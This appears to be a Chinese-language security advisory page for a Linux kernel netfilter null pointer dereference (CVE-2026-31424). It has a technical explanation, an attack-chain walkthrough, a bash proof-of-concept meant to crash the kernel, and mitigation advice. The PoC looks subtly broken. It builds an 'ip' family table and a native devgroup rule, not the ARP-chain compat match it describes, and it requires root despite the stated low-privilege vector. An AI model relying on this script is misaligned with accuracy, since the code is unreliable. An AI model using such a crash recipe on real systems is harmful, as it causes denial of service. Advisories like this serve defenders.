CVE-2026-31424 CVSS 5.5 中危

CVE-2026-31424 Linux内核netfilter空指针解引用漏洞

披露日期: 2026-04-13

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31424

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核netfilter组件存在安全漏洞。由于NFPROTO_UNSPEC扩展可通过nft_compat被任何协议族加载，而ARP协议的hooks布局与IPv4/IPv6不同，导致验证逻辑缺陷。攻击者可在ARP链上加载INET扩展，触发空指针解引用，导致内核崩溃。

技术细节

该漏洞位于netfilter的x_tables模块。注册为NFPROTO_UNSPEC的xt_match/xt_target使用NF_INET_*常量定义hooks。ARP协议仅有3个hooks（0-2），其数值与INET hooks重叠（如NF_ARP_OUT == NF_INET_LOCAL_IN）。通过nft_compat将INET扩展加载至ARP链时，验证逻辑错误通过。由于ARP hooks不设置INET预期的state->in字段，导致匹配函数（如xt_devgroup）访问NULL指针，引发Oops及内核恐慌，造成本地拒绝服务。

攻击链分析

STEP 1

1. 本地访问

攻击者需要具备本地访问权限（AV:L）以及低权限用户身份（PR:L），能够加载内核模块或配置nftables。

STEP 2

2. 构造恶意规则

攻击者利用nft_compat机制，将原本用于INET协议族的扩展（如xt_devgroup）加载到ARP协议链中。

STEP 3

3. 触发漏洞

当系统处理ARP包并经过上述恶意规则时，由于ARP hook环境与INET扩展不匹配，代码尝试访问未初始化的state->in指针。

STEP 4

4. 系统崩溃

访问空指针导致内核发生一般保护性错误和内核恐慌，系统崩溃或重启，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-31424
# Triggering NULL pointer dereference in netfilter ARP handling

# Check root privileges
if [ "$EUID" -ne 0 ]; then
  echo "Please run as root"
  exit
fi

# Load module if not loaded
modprobe nf_tables

# Create a table for ARP
nft add table ip arp_poc

# Create an ARP chain (hook input)
nft add chain ip arp_poc input '{ type filter hook input priority 0 ; }'

# Add a rule using 'devgroup' match which expects INET hooks context
# On vulnerable kernels, this triggers a NULL pointer dereference when processing ARP traffic
nft add rule ip arp_poc input meta devgroup set 0

echo "Rule added. Sending ARP packet to trigger crash..."
# Triggering the rule might require actual traffic or specific packet injection
# This script sets up the condition described in the CVE analysis.

影响范围

Linux Kernel (修复前版本)

防御指南

临时缓解措施

建议立即应用官方发布的补丁程序。在无法进行内核升级的情况下，可以通过严格限制用户权限，禁止非特权用户修改防火墙规则来缓解风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表